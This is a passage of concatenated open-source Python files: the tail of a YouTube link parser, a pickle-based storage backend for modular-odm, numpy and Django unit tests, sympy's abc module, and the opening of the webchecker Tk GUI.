        if not (url_desc_map.has_key(u"url") or url_desc_map.has_key(u"stream")):
            continue

        try:
            key = int(url_desc_map[u"itag"][0])
            url = u""
            if url_desc_map.has_key(u"url"):
                # Plain progressive-download URL.
                url = urllib.unquote(url_desc_map[u"url"][0])
            elif url_desc_map.has_key(u"conn") and url_desc_map.has_key(u"stream"):
                # RTMP: join connection endpoint and stream path.
                url = urllib.unquote(url_desc_map[u"conn"][0])
                if url.rfind("/") < len(url) - 1:
                    url = url + "/"
                url = url + urllib.unquote(url_desc_map[u"stream"][0])
            elif url_desc_map.has_key(u"stream") and not url_desc_map.has_key(u"conn"):
                url = urllib.unquote(url_desc_map[u"stream"][0])

            if url_desc_map.has_key(u"sig"):
                url = url + u"&signature=" + url_desc_map[u"sig"][0]

            video_urls.append(["(" + fmt_value[key] + ") [youtube]", url])
        except Exception:
            # Unknown itag or malformed entry: log and keep scanning.
            logger.info("ERROR EN " + str(url_desc))

    return video_urls


def find_videos(data):
    """Scan arbitrary page text for embedded YouTube references.

    :return: list of [title, url, server] triples, de-duplicated by URL.
    """
    encontrados = set()
    devuelve = []

    # watch/embed/v style URLs, including the nocookie domain.
    patronvideos = 'youtube(?:-nocookie)?\.com/(?:(?:(?:v/|embed/))|(?:(?:watch(?:_popup)?(?:\.php)?)?(?:\?|#!?)(?:.+&)?v=))?([0-9A-Za-z_-]{11})'
    logger.info("[youtube.py] find_videos #" + patronvideos + "#")
    matches = re.compile(patronvideos, re.DOTALL).findall(data)
    for match in matches:
        titulo = "[YouTube]"
        url = "http://www.youtube.com/watch?v=" + match
        if url != '':
            if url not in encontrados:
                logger.info("  url=" + url)
                devuelve.append([titulo, url, 'youtube'])
                encontrados.add(url)
            else:
                logger.info("  url duplicada=" + url)

    # "?v=" / "%3D"-encoded parameter style.
    patronvideos = 'www.youtube.*?v(?:=|%3D)([0-9A-Za-z_-]{11})'
    logger.info("[youtube.py] find_videos #" + patronvideos + "#")
    matches = re.compile(patronvideos, re.DOTALL).findall(data)
    for match in matches:
        titulo = "[YouTube]"
        url = "http://www.youtube.com/watch?v=" + match
        if url not in encontrados:
            logger.info("  url=" + url)
            devuelve.append([titulo, url, 'youtube'])
            encontrados.add(url)
        else:
            logger.info("  url duplicada=" + url)

    # http://www.youtube.com/v/AcbsMOMg2fQ
    patronvideos = 'youtube.com/v/([0-9A-Za-z_-]{11})'
    logger.info("[youtube.py] find_videos #" + patronvideos + "#")
    matches = re.compile(patronvideos, re.DOTALL).findall(data)
    for match in matches:
        titulo = "[YouTube]"
        url = "http://www.youtube.com/watch?v=" + match
        if url not in encontrados:
            logger.info("  url=" + url)
            devuelve.append([titulo, url, 'youtube'])
            encontrados.add(url)
        else:
            logger.info("  url duplicada=" + url)

    return devuelve


def test():
    """Smoke test: resolving a known watch URL yields at least one stream."""
    video_urls = get_video_url("http://www.youtube.com/watch?v=Kk-435429-M")
    return len(video_urls) > 0
gpl-3.0
CenterForOpenScience/modular-odm
modularodm/storage/picklestorage.py
4
7102
# -*- coding utf-8 -*-

import os
import copy

import six

from .base import Storage
from ..query.queryset import BaseQuerySet
from ..query.query import QueryGroup
from ..query.query import RawQuery

from modularodm.utils import DirtyField
from modularodm.exceptions import (
    KeyExistsException,
    MultipleResultsFound,
    NoResultsFound,
)

# BUG FIX: the fast C pickler on Python 2 is spelled "cPickle"; the previous
# "import cpickle" could never succeed, so the pure-Python fallback always ran.
try:
    import cPickle as pickle
except ImportError:
    import pickle


def _eq(data, test):
    """Equality filter; a list-valued field matches when it *contains* test."""
    if isinstance(data, list):
        return test in data
    return data == test


# Query operator name -> predicate(data, argument).
operators = {

    'eq': _eq,
    'ne': lambda data, test: data != test,
    'gt': lambda data, test: data > test,
    'gte': lambda data, test: data >= test,
    'lt': lambda data, test: data < test,
    'lte': lambda data, test: data <= test,
    'in': lambda data, test: data in test,
    'nin': lambda data, test: data not in test,

    'startswith': lambda data, test: data.startswith(test),
    'endswith': lambda data, test: data.endswith(test),
    'contains': lambda data, test: test in data,
    'icontains': lambda data, test: test.lower() in data.lower(),

}


class PickleQuerySet(BaseQuerySet):
    """Lazily sorted/sliced view over a list of raw records."""

    # Lazily-applied modifiers; DirtyField marks the result stale on write.
    _sort = DirtyField(None)
    _offset = DirtyField(None)
    _limit = DirtyField(None)

    def __init__(self, schema, data):
        super(PickleQuerySet, self).__init__(schema)
        self._data = list(data)
        self._dirty = True
        self.data = []

    def _eval(self):
        """Materialize self.data from self._data, applying sort/offset/limit."""
        if self._dirty:
            self.data = self._data[:]
            if self._sort is not None:
                # Apply sort keys right-to-left so the leftmost key dominates
                # (stable sorts compose this way).
                for key in self._sort[::-1]:
                    if key.startswith('-'):
                        reverse = True
                        key = key.lstrip('-')
                    else:
                        reverse = False
                    self.data = sorted(
                        self.data,
                        key=lambda record: record[key],
                        reverse=reverse
                    )
            if self._offset is not None:
                self.data = self.data[self._offset:]
            if self._limit is not None:
                self.data = self.data[:self._limit]
            self._dirty = False
        return self

    def _do_getitem(self, index, raw=False):
        """Return the item(s) at ``index``; primary key only when ``raw``."""
        self._eval()
        if isinstance(index, slice):
            return PickleQuerySet(self.schema, self.data[index])
        result = self.data[index]
        if raw:
            return result[self.primary]
        return self.schema.load(data=result)

    def __iter__(self, raw=False):
        self._eval()
        if raw:
            # NOTE(review): raw mode returns a *list*, not an iterator;
            # get_keys() relies on this asymmetry.
            return [each[self.primary] for each in self.data]
        return (self.schema.load(data=each) for each in self.data)

    def __len__(self):
        self._eval()
        return len(self.data)

    count = __len__

    def get_key(self, index):
        return self.__getitem__(index, raw=True)

    def get_keys(self):
        return list(self.__iter__(raw=True))

    def sort(self, *keys):
        """ Iteratively sort data by keys in reverse order. """
        self._sort = keys
        return self

    def offset(self, n):
        self._offset = n
        return self

    def limit(self, n):
        self._limit = n
        return self


class PickleStorage(Storage):
    """ Storage backend using pickle. """

    QuerySet = PickleQuerySet

    def __init__(self, collection_name, prefix='db_', ext='pkl'):
        """Build pickle file name and load data if exists.

        :param collection_name: Collection name
        :param prefix: File prefix.
        :param ext: File extension.

        """
        # Build filename
        filename = collection_name + '.' + ext
        if prefix:
            self.filename = prefix + filename
        else:
            self.filename = filename

        # Initialize empty store
        self.store = {}

        # Load file if exists
        if os.path.exists(self.filename):
            with open(self.filename, 'rb') as fp:
                data = fp.read()
                self.store = pickle.loads(data)

    def _delete_file(self):
        """Best-effort removal of the backing pickle file."""
        try:
            os.remove(self.filename)
        except OSError:
            pass

    def insert(self, primary_name, key, value):
        """Insert a deep copy of ``value`` under ``key`` and flush to disk.

        :raises KeyExistsException: if ``key`` is already present.
        """
        if key not in self.store:
            self.store[key] = copy.deepcopy(value)
            self.flush()
        else:
            msg = 'Key ({key}) already exists'.format(key=key)
            raise KeyExistsException(msg)

    def update(self, query, data):
        """Apply ``data``'s key/value pairs to every record matching query.

        NOTE(review): unlike insert()/remove(), this does not flush() the
        store to disk -- confirm whether that is intentional.
        """
        data = copy.deepcopy(data)
        for pk in self.find(query, by_pk=True):
            for key, value in data.items():
                self.store[pk][key] = value

    def get(self, primary_name, key):
        """Return a deep copy of the record at ``key``, or None if absent."""
        data = self.store.get(key)
        if data is not None:
            return copy.deepcopy(data)

    def _remove_by_pk(self, key, flush=True):
        """Remove the record with primary key ``key``; missing keys are a no-op.

        :param key: Key
        """
        # BUG FIX: was a blanket ``except Exception: pass`` that also hid
        # unrelated failures; only a missing key is expected here.
        try:
            del self.store[key]
        except KeyError:
            pass
        if flush:
            self.flush()

    def remove(self, query=None):
        """Remove every record matching ``query`` (all records when None)."""
        for key in self.find(query, by_pk=True):
            self._remove_by_pk(key, flush=False)
        self.flush()

    def flush(self):
        """Persist the in-memory store to disk (highest pickle protocol)."""
        with open(self.filename, 'wb') as fp:
            pickle.dump(self.store, fp, -1)

    def find_one(self, query=None, **kwargs):
        """Return the single record matching ``query``.

        :raises NoResultsFound: when nothing matches.
        :raises MultipleResultsFound: when more than one record matches.
        """
        results = list(self.find(query))
        if len(results) == 1:
            return results[0]
        elif len(results) == 0:
            raise NoResultsFound()
        else:
            raise MultipleResultsFound(
                'Query for find_one must return exactly one result; '
                'returned {0}'.format(len(results))
            )

    def _match(self, value, query):
        """Recursively evaluate ``query`` against raw record ``value``."""
        if isinstance(query, QueryGroup):
            matches = [self._match(value, node) for node in query.nodes]
            if query.operator == 'and':
                return all(matches)
            elif query.operator == 'or':
                return any(matches)
            elif query.operator == 'not':
                return not any(matches)
            else:
                raise ValueError('QueryGroup operator must be <and>, <or>, or <not>.')
        elif isinstance(query, RawQuery):
            attribute, operator, argument = \
                query.attribute, query.operator, query.argument
            return operators[operator](value[attribute], argument)
        else:
            raise TypeError('Query must be a QueryGroup or Query object.')

    def find(self, query=None, **kwargs):
        """Yield records matching ``query`` (every record when query is None).

        Pass ``by_pk=True`` to yield primary keys instead of raw records.

        BUG FIX: the query-is-None branch previously ignored ``by_pk`` and
        always yielded values, which broke ``remove()`` with no query; it
        also iterated the live dict, so mutation during iteration failed.
        Both branches now iterate a snapshot and honor ``by_pk``.
        """
        for key, value in list(six.iteritems(self.store)):
            if query is None or self._match(value, query):
                if kwargs.get('by_pk'):
                    yield key
                else:
                    yield value
apache-2.0
victor-prado/broker-manager
environment/lib/python3.5/site-packages/numpy/lib/tests/test_shape_base.py
22
14660
from __future__ import division, absolute_import, print_function import numpy as np from numpy.lib.shape_base import ( apply_along_axis, apply_over_axes, array_split, split, hsplit, dsplit, vsplit, dstack, column_stack, kron, tile ) from numpy.testing import ( run_module_suite, TestCase, assert_, assert_equal, assert_array_equal, assert_raises, assert_warns ) class TestApplyAlongAxis(TestCase): def test_simple(self): a = np.ones((20, 10), 'd') assert_array_equal( apply_along_axis(len, 0, a), len(a)*np.ones(a.shape[1])) def test_simple101(self, level=11): a = np.ones((10, 101), 'd') assert_array_equal( apply_along_axis(len, 0, a), len(a)*np.ones(a.shape[1])) def test_3d(self): a = np.arange(27).reshape((3, 3, 3)) assert_array_equal(apply_along_axis(np.sum, 0, a), [[27, 30, 33], [36, 39, 42], [45, 48, 51]]) def test_preserve_subclass(self): def double(row): return row * 2 m = np.matrix([[0, 1], [2, 3]]) result = apply_along_axis(double, 0, m) assert isinstance(result, np.matrix) assert_array_equal( result, np.matrix([[0, 2], [4, 6]]) ) def test_subclass(self): class MinimalSubclass(np.ndarray): data = 1 def minimal_function(array): return array.data a = np.zeros((6, 3)).view(MinimalSubclass) assert_array_equal( apply_along_axis(minimal_function, 0, a), np.array([1, 1, 1]) ) def test_scalar_array(self): class MinimalSubclass(np.ndarray): pass a = np.ones((6, 3)).view(MinimalSubclass) res = apply_along_axis(np.sum, 0, a) assert isinstance(res, MinimalSubclass) assert_array_equal(res, np.array([6, 6, 6]).view(MinimalSubclass)) def test_tuple_func1d(self): def sample_1d(x): return x[1], x[0] res = np.apply_along_axis(sample_1d, 1, np.array([[1, 2], [3, 4]])) assert_array_equal(res, np.array([[2, 1], [4, 3]])) class TestApplyOverAxes(TestCase): def test_simple(self): a = np.arange(24).reshape(2, 3, 4) aoa_a = apply_over_axes(np.sum, a, [0, 2]) assert_array_equal(aoa_a, np.array([[[60], [92], [124]]])) class TestArraySplit(TestCase): def test_integer_0_split(self): a = 
# NOTE(review): this chunk begins mid-method — the enclosing TestArraySplit
# class statement and the `def` line of the first test lie before this
# extract.  The two orphan statements below are the tail of that truncated
# test (an array_split(a, 0) failure check); tokens kept exactly as found.
        np.arange(10)
        assert_raises(ValueError, array_split, a, 0)

    def test_integer_split(self):
        # Splitting a length-10 array into 1..11 sections: array_split pads
        # the trailing sections so section count need not divide the length.
        a = np.arange(10)
        res = array_split(a, 1)
        desired = [np.arange(10)]
        compare_results(res, desired)
        res = array_split(a, 2)
        desired = [np.arange(5), np.arange(5, 10)]
        compare_results(res, desired)
        res = array_split(a, 3)
        desired = [np.arange(4), np.arange(4, 7), np.arange(7, 10)]
        compare_results(res, desired)
        res = array_split(a, 4)
        desired = [np.arange(3), np.arange(3, 6), np.arange(6, 8),
                   np.arange(8, 10)]
        compare_results(res, desired)
        res = array_split(a, 5)
        desired = [np.arange(2), np.arange(2, 4), np.arange(4, 6),
                   np.arange(6, 8), np.arange(8, 10)]
        compare_results(res, desired)
        res = array_split(a, 6)
        desired = [np.arange(2), np.arange(2, 4), np.arange(4, 6),
                   np.arange(6, 8), np.arange(8, 9), np.arange(9, 10)]
        compare_results(res, desired)
        res = array_split(a, 7)
        desired = [np.arange(2), np.arange(2, 4), np.arange(4, 6),
                   np.arange(6, 7), np.arange(7, 8), np.arange(8, 9),
                   np.arange(9, 10)]
        compare_results(res, desired)
        res = array_split(a, 8)
        desired = [np.arange(2), np.arange(2, 4), np.arange(4, 5),
                   np.arange(5, 6), np.arange(6, 7), np.arange(7, 8),
                   np.arange(8, 9), np.arange(9, 10)]
        compare_results(res, desired)
        res = array_split(a, 9)
        desired = [np.arange(2), np.arange(2, 3), np.arange(3, 4),
                   np.arange(4, 5), np.arange(5, 6), np.arange(6, 7),
                   np.arange(7, 8), np.arange(8, 9), np.arange(9, 10)]
        compare_results(res, desired)
        res = array_split(a, 10)
        desired = [np.arange(1), np.arange(1, 2), np.arange(2, 3),
                   np.arange(3, 4), np.arange(4, 5), np.arange(5, 6),
                   np.arange(6, 7), np.arange(7, 8), np.arange(8, 9),
                   np.arange(9, 10)]
        compare_results(res, desired)
        res = array_split(a, 11)
        # More sections than elements: the surplus section is empty.
        desired = [np.arange(1), np.arange(1, 2), np.arange(2, 3),
                   np.arange(3, 4), np.arange(4, 5), np.arange(5, 6),
                   np.arange(6, 7), np.arange(7, 8), np.arange(8, 9),
                   np.arange(9, 10), np.array([])]
        compare_results(res, desired)

    def test_integer_split_2D_rows(self):
        # axis=0 split of a (2, 10) array into 3: third piece is empty but
        # must keep the input's dtype.
        a = np.array([np.arange(10), np.arange(10)])
        res = array_split(a, 3, axis=0)
        tgt = [np.array([np.arange(10)]), np.array([np.arange(10)]),
               np.zeros((0, 10))]
        compare_results(res, tgt)
        assert_(a.dtype.type is res[-1].dtype.type)
        # Same thing for manual splits:
        res = array_split(a, [0, 1, 2], axis=0)
        tgt = [np.zeros((0, 10)), np.array([np.arange(10)]),
               np.array([np.arange(10)])]
        compare_results(res, tgt)
        assert_(a.dtype.type is res[-1].dtype.type)

    def test_integer_split_2D_cols(self):
        a = np.array([np.arange(10), np.arange(10)])
        res = array_split(a, 3, axis=-1)
        desired = [np.array([np.arange(4), np.arange(4)]),
                   np.array([np.arange(4, 7), np.arange(4, 7)]),
                   np.array([np.arange(7, 10), np.arange(7, 10)])]
        compare_results(res, desired)

    def test_integer_split_2D_default(self):
        """ This will fail if we change default axis
        """
        a = np.array([np.arange(10), np.arange(10)])
        res = array_split(a, 3)
        tgt = [np.array([np.arange(10)]), np.array([np.arange(10)]),
               np.zeros((0, 10))]
        compare_results(res, tgt)
        assert_(a.dtype.type is res[-1].dtype.type)
        # perhaps should check higher dimensions

    def test_index_split_simple(self):
        # Splitting by explicit index list instead of a section count.
        a = np.arange(10)
        indices = [1, 5, 7]
        res = array_split(a, indices, axis=-1)
        desired = [np.arange(0, 1), np.arange(1, 5), np.arange(5, 7),
                   np.arange(7, 10)]
        compare_results(res, desired)

    def test_index_split_low_bound(self):
        # An index of 0 yields a leading empty piece.
        a = np.arange(10)
        indices = [0, 5, 7]
        res = array_split(a, indices, axis=-1)
        desired = [np.array([]), np.arange(0, 5), np.arange(5, 7),
                   np.arange(7, 10)]
        compare_results(res, desired)

    def test_index_split_high_bound(self):
        # Indices past the end yield trailing empty pieces.
        a = np.arange(10)
        indices = [0, 5, 7, 10, 12]
        res = array_split(a, indices, axis=-1)
        desired = [np.array([]), np.arange(0, 5), np.arange(5, 7),
                   np.arange(7, 10), np.array([]), np.array([])]
        compare_results(res, desired)


class TestSplit(TestCase):
    # The split function is essentially the same as array_split,
    # except that it tests whether splitting will result in an
    # equal split.  Only test for this case.

    def test_equal_split(self):
        a = np.arange(10)
        res = split(a, 2)
        desired = [np.arange(5), np.arange(5, 10)]
        compare_results(res, desired)

    def test_unequal_split(self):
        # split() (unlike array_split) refuses a non-divisible section count.
        a = np.arange(10)
        assert_raises(ValueError, split, a, 3)


class TestColumnStack(TestCase):
    def test_non_iterable(self):
        assert_raises(TypeError, column_stack, 1)


class TestDstack(TestCase):
    def test_non_iterable(self):
        assert_raises(TypeError, dstack, 1)

    def test_0D_array(self):
        a = np.array(1)
        b = np.array(2)
        res = dstack([a, b])
        desired = np.array([[[1, 2]]])
        assert_array_equal(res, desired)

    def test_1D_array(self):
        a = np.array([1])
        b = np.array([2])
        res = dstack([a, b])
        desired = np.array([[[1, 2]]])
        assert_array_equal(res, desired)

    def test_2D_array(self):
        a = np.array([[1], [2]])
        b = np.array([[1], [2]])
        res = dstack([a, b])
        desired = np.array([[[1, 1]], [[2, 2, ]]])
        assert_array_equal(res, desired)

    def test_2D_array2(self):
        a = np.array([1, 2])
        b = np.array([1, 2])
        res = dstack([a, b])
        desired = np.array([[[1, 1], [2, 2]]])
        assert_array_equal(res, desired)


# array_split has more comprehensive test of splitting.
# only do simple test on hsplit, vsplit, and dsplit
class TestHsplit(TestCase):
    """Only testing for integer splits.
    """
    def test_non_iterable(self):
        assert_raises(ValueError, hsplit, 1, 1)

    def test_0D_array(self):
        # hsplit needs at least 1-D input.
        a = np.array(1)
        try:
            hsplit(a, 2)
            assert_(0)
        except ValueError:
            pass

    def test_1D_array(self):
        a = np.array([1, 2, 3, 4])
        res = hsplit(a, 2)
        desired = [np.array([1, 2]), np.array([3, 4])]
        compare_results(res, desired)

    def test_2D_array(self):
        a = np.array([[1, 2, 3, 4], [1, 2, 3, 4]])
        res = hsplit(a, 2)
        desired = [np.array([[1, 2], [1, 2]]), np.array([[3, 4], [3, 4]])]
        compare_results(res, desired)


class TestVsplit(TestCase):
    """Only testing for integer splits.
    """
    def test_non_iterable(self):
        assert_raises(ValueError, vsplit, 1, 1)

    def test_0D_array(self):
        a = np.array(1)
        assert_raises(ValueError, vsplit, a, 2)

    def test_1D_array(self):
        # vsplit needs at least 2-D input.
        a = np.array([1, 2, 3, 4])
        try:
            vsplit(a, 2)
            assert_(0)
        except ValueError:
            pass

    def test_2D_array(self):
        a = np.array([[1, 2, 3, 4], [1, 2, 3, 4]])
        res = vsplit(a, 2)
        desired = [np.array([[1, 2, 3, 4]]), np.array([[1, 2, 3, 4]])]
        compare_results(res, desired)


class TestDsplit(TestCase):
    # Only testing for integer splits.
    def test_non_iterable(self):
        assert_raises(ValueError, dsplit, 1, 1)

    def test_0D_array(self):
        a = np.array(1)
        assert_raises(ValueError, dsplit, a, 2)

    def test_1D_array(self):
        a = np.array([1, 2, 3, 4])
        assert_raises(ValueError, dsplit, a, 2)

    def test_2D_array(self):
        # dsplit needs at least 3-D input.
        a = np.array([[1, 2, 3, 4], [1, 2, 3, 4]])
        try:
            dsplit(a, 2)
            assert_(0)
        except ValueError:
            pass

    def test_3D_array(self):
        a = np.array([[[1, 2, 3, 4], [1, 2, 3, 4]],
                      [[1, 2, 3, 4], [1, 2, 3, 4]]])
        res = dsplit(a, 2)
        desired = [np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]]),
                   np.array([[[3, 4], [3, 4]], [[3, 4], [3, 4]]])]
        compare_results(res, desired)


class TestSqueeze(TestCase):
    def test_basic(self):
        from numpy.random import rand

        a = rand(20, 10, 10, 1, 1)
        b = rand(20, 1, 10, 1, 20)
        c = rand(1, 1, 20, 10)
        assert_array_equal(np.squeeze(a), np.reshape(a, (20, 10, 10)))
        assert_array_equal(np.squeeze(b), np.reshape(b, (20, 10, 20)))
        assert_array_equal(np.squeeze(c), np.reshape(c, (20, 10)))

        # Squeezing to 0-dim should still give an ndarray
        a = [[[1.5]]]
        res = np.squeeze(a)
        assert_equal(res, 1.5)
        assert_equal(res.ndim, 0)
        assert_equal(type(res), np.ndarray)


class TestKron(TestCase):
    def test_return_type(self):
        # kron's return type follows __array_priority__ of the operands.
        a = np.ones([2, 2])
        m = np.asmatrix(a)
        assert_equal(type(kron(a, a)), np.ndarray)
        assert_equal(type(kron(m, m)), np.matrix)
        assert_equal(type(kron(a, m)), np.matrix)
        assert_equal(type(kron(m, a)), np.matrix)

        class myarray(np.ndarray):
            __array_priority__ = 0.0

        ma = myarray(a.shape, a.dtype, a.data)
        assert_equal(type(kron(a, a)), np.ndarray)
        assert_equal(type(kron(ma, ma)), myarray)
        # Priority 0.0 is below ndarray's, so the plain array wins here.
        assert_equal(type(kron(a, ma)), np.ndarray)
        assert_equal(type(kron(ma, a)), myarray)


class TestTile(TestCase):
    def test_basic(self):
        a = np.array([0, 1, 2])
        b = [[1, 2], [3, 4]]
        assert_equal(tile(a, 2), [0, 1, 2, 0, 1, 2])
        assert_equal(tile(a, (2, 2)), [[0, 1, 2, 0, 1, 2], [0, 1, 2, 0, 1, 2]])
        assert_equal(tile(a, (1, 2)), [[0, 1, 2, 0, 1, 2]])
        assert_equal(tile(b, 2), [[1, 2, 1, 2], [3, 4, 3, 4]])
        assert_equal(tile(b, (2, 1)), [[1, 2], [3, 4], [1, 2], [3, 4]])
        assert_equal(tile(b, (2, 2)), [[1, 2, 1, 2], [3, 4, 3, 4],
                                       [1, 2, 1, 2], [3, 4, 3, 4]])

    def test_tile_one_repetition_on_array_gh4679(self):
        # Regression test: tile(a, 1) must return a copy, not a view.
        a = np.arange(5)
        b = tile(a, 1)
        b += 2
        assert_equal(a, np.arange(5))

    def test_empty(self):
        a = np.array([[[]]])
        b = np.array([[], []])
        c = tile(b, 2).shape
        d = tile(a, (3, 2, 5)).shape
        assert_equal(c, (2, 0))
        assert_equal(d, (3, 2, 0))

    def test_kroncompare(self):
        # tile(b, r) must agree with kron(ones(r), b).
        from numpy.random import randint

        reps = [(2,), (1, 2), (2, 1), (2, 2), (2, 3, 2), (3, 2)]
        shape = [(3,), (2, 3), (3, 4, 3), (3, 2, 3), (4, 3, 2, 4), (2, 2)]
        for s in shape:
            b = randint(0, 10, size=s)
            for r in reps:
                a = np.ones(r, b.dtype)
                large = tile(b, r)
                klarge = kron(a, b)
                assert_equal(large, klarge)


class TestMayShareMemory(TestCase):
    def test_basic(self):
        d = np.ones((50, 60))
        d2 = np.ones((30, 60, 6))
        self.assertTrue(np.may_share_memory(d, d))
        self.assertTrue(np.may_share_memory(d, d[::-1]))
        self.assertTrue(np.may_share_memory(d, d[::2]))
        self.assertTrue(np.may_share_memory(d, d[1:, ::-1]))

        self.assertFalse(np.may_share_memory(d[::-1], d2))
        self.assertFalse(np.may_share_memory(d[::2], d2))
        self.assertFalse(np.may_share_memory(d[1:, ::-1], d2))
        self.assertTrue(np.may_share_memory(d2[1:, ::-1], d2))


# Utility
def compare_results(res, desired):
    # Element-wise comparison of two equal-length sequences of arrays.
    for i in range(len(desired)):
        assert_array_equal(res[i], desired[i])


if __name__ == "__main__":
    run_module_suite()
mit
wsmith323/django
tests/utils_tests/test_regex_helper.py
448
1784
from __future__ import unicode_literals

import unittest

from django.utils import regex_helper


class NormalizeTests(unittest.TestCase):
    """Tests for regex_helper.normalize(), which converts a regex pattern
    into a list of (format-string, group-name-list) pairs."""

    def assertNormalized(self, pattern, expected):
        # Shared helper: every test is "normalize(pattern) == expected".
        self.assertEqual(regex_helper.normalize(pattern), expected)

    def test_empty(self):
        self.assertNormalized(r"", [('', [])])

    def test_escape(self):
        # Backslash-escaped metacharacters come out as their literal selves.
        self.assertNormalized(r"\\\^\$\.\|\?\*\+\(\)\[",
                              [('\\^$.|?*+()[', [])])

    def test_group_positional(self):
        # Unnamed groups get synthetic names _0, _1, ...
        self.assertNormalized(r"(.*)-(.+)", [('%(_0)s-%(_1)s', ['_0', '_1'])])

    def test_group_ignored(self):
        # Inline flags and comments contribute nothing to the result.
        self.assertNormalized(r"(?i)(?L)(?m)(?s)(?u)(?#)", [('', [])])

    def test_group_noncapturing(self):
        self.assertNormalized(r"(?:non-capturing)", [('non-capturing', [])])

    def test_group_named(self):
        self.assertNormalized(
            r"(?P<first_group_name>.*)-(?P<second_group_name>.*)",
            [('%(first_group_name)s-%(second_group_name)s',
              ['first_group_name', 'second_group_name'])])

    def test_group_backreference(self):
        # A backreference reuses the group's value but the name is listed once.
        self.assertNormalized(
            r"(?P<first_group_name>.*)-(?P=first_group_name)",
            [('%(first_group_name)s-%(first_group_name)s',
              ['first_group_name'])])
bsd-3-clause
robertmattmueller/sdac-compiler
sympy/abc.py
30
1877
# sympy/abc.py — exports one Symbol per Latin letter and per Greek-letter
# name, so users can write `from sympy.abc import x, y, alpha`.
from __future__ import print_function, division

import string

from .core import Symbol
from .core.alphabets import greeks
from .core.compatibility import exec_

_latin = list(string.ascii_letters)
# COSINEQ should not be imported as they clash; gamma, pi and zeta clash, too
_greek = list(greeks)  # make a copy, so we can mutate it
# Note: We import lamda since lambda is a reserved keyword in Python
_greek.remove("lambda")
_greek.append("lamda")

# Create a module-level Symbol for every letter name.  exec_ is used so the
# generated names land in this module's namespace.
for _s in _latin + _greek:
    exec_("%s = Symbol('%s')" % (_s, _s))


def clashing():
    """Return the clashing-symbols dictionaries.

    ``clash1`` defines all the single letter variables that clash with
    SymPy objects; ``clash2`` defines the multi-letter clashing symbols;
    and ``clash`` is the union of both. These can be passed for ``locals``
    during sympification if one desires Symbols rather than the non-Symbol
    objects for those names.

    Examples
    ========

    >>> from sympy import S
    >>> from sympy.abc import _clash1, _clash2, _clash
    >>> S("Q & C", locals=_clash1)
    And(C, Q)
    >>> S('pi(x)', locals=_clash2)
    pi(x)
    >>> S('pi(C, Q)', locals=_clash)
    pi(C, Q)

    Note: if changes are made to the docstring examples they can only
    be tested after removing "clashing" from the list of deleted items
    at the bottom of this file which removes this function from the
    namespace.
    """

    ns = {}
    exec_('from sympy import *', ns)
    clash1 = {}
    clash2 = {}
    # Walk every name `from sympy import *` would export; any name that is
    # also a letter name shadows the Symbol created above, so record it and
    # drop it from the letter lists as a side effect.
    while ns:
        k, _ = ns.popitem()
        if k in _greek:
            clash2[k] = Symbol(k)
            _greek.remove(k)
        elif k in _latin:
            clash1[k] = Symbol(k)
            _latin.remove(k)
    clash = {}
    clash.update(clash1)
    clash.update(clash2)
    return clash1, clash2, clash

_clash1, _clash2, _clash = clashing()

# Clean up: leave only the Symbols and the _clash* dicts in the namespace.
del _latin, _greek, _s, clashing, Symbol
gpl-3.0
matmutant/sl4a
python/src/Tools/webchecker/wcgui.py
50
15272
#! /usr/bin/env python

# NOTE(review): Python 2 code (print statements, `except E, v` syntax,
# Tkinter/has_key) — do not run under Python 3 without porting.

"""GUI interface to webchecker.

This works as a Grail applet too!  E.g.

  <APPLET CODE=wcgui.py NAME=CheckerWindow></APPLET>

Checkpoints are not (yet??? ever???) supported.

User interface:

Enter a root to check in the text entry box.  To enter more than one root,
enter them one at a time and press <Return> for each one.

Command buttons Start, Stop and "Check one" govern the checking process in
the obvious way.  Start and "Check one" also enter the root from the text
entry box if one is present.  There's also a check box (enabled by default)
to decide whether actually to follow external links (since this can slow
the checking down considerably).  Finally there's a Quit button.

A series of checkbuttons determines whether the corresponding output panel
is shown.  List panels are also automatically shown or hidden when their
status changes between empty to non-empty.  There are six panels:

Log        -- raw output from the checker (-v, -q affect this)
To check   -- links discovered but not yet checked
Checked    -- links that have been checked
Bad links  -- links that failed upon checking
Errors     -- pages containing at least one bad link
Details    -- details about one URL; double click on a URL in any of the
              above list panels (not in Log) will show details for that URL

Use your window manager's Close command to quit.

Command line options:

-m bytes  -- skip HTML pages larger than this size (default %(MAXPAGE)d)
-q        -- quiet operation (also suppresses external links report)
-v        -- verbose operation; repeating -v will increase verbosity
-t root   -- specify root dir which should be treated as internal (can repeat)
-a        -- don't check name anchors

Command line arguments:

rooturl   -- URL to start checking (default %(DEFROOT)s)

XXX The command line options (-m, -q, -v) should be GUI accessible.

XXX The roots should be visible as a list (?).

XXX The multipanel user interface is clumsy.

"""
# ' Emacs bait

import sys
import getopt
from Tkinter import *
import tktools
import webchecker

# Override some for a weaker platform
if sys.platform == 'mac':
    webchecker.DEFROOT = "http://grail.cnri.reston.va.us/"
    webchecker.MAXPAGE = 50000
    webchecker.verbose = 4


def main():
    # Parse options, configure the webchecker module globals, build the GUI
    # and enter the Tk main loop.
    try:
        opts, args = getopt.getopt(sys.argv[1:], 't:m:qva')
    except getopt.error, msg:
        sys.stdout = sys.stderr
        print msg
        # Module docstring doubles as usage text (with %()s placeholders).
        print __doc__%vars(webchecker)
        sys.exit(2)
    webchecker.verbose = webchecker.VERBOSE
    webchecker.nonames = webchecker.NONAMES
    webchecker.maxpage = webchecker.MAXPAGE
    extra_roots = []
    for o, a in opts:
        if o == '-m':
            webchecker.maxpage = int(a)
        if o == '-q':
            webchecker.verbose = 0
        if o == '-v':
            webchecker.verbose = webchecker.verbose + 1
        if o == '-t':
            extra_roots.append(a)
        if o == '-a':
            webchecker.nonames = not webchecker.nonames
    root = Tk(className='Webchecker')
    root.protocol("WM_DELETE_WINDOW", root.quit)
    c = CheckerWindow(root)
    c.setflags(verbose=webchecker.verbose, maxpage=webchecker.maxpage,
               nonames=webchecker.nonames)
    if args:
        for arg in args[:-1]:
            c.addroot(arg)
        c.suggestroot(args[-1])
    # Usually conditioned on whether external links
    # will be checked, but since that's not a command
    # line option, just toss them in.
    for url_root in extra_roots:
        # Make sure it's terminated by a slash,
        # so that addroot doesn't discard the last
        # directory component.
        if url_root[-1] != "/":
            url_root = url_root + "/"
        c.addroot(url_root, add_to_do=0)
    root.mainloop()


class CheckerWindow(webchecker.Checker):
    # Tk front-end: subclasses webchecker.Checker and mirrors checker state
    # changes (setbad/setgood/newlink/markdone/seterror) into list panels.

    def __init__(self, parent, root=webchecker.DEFROOT):
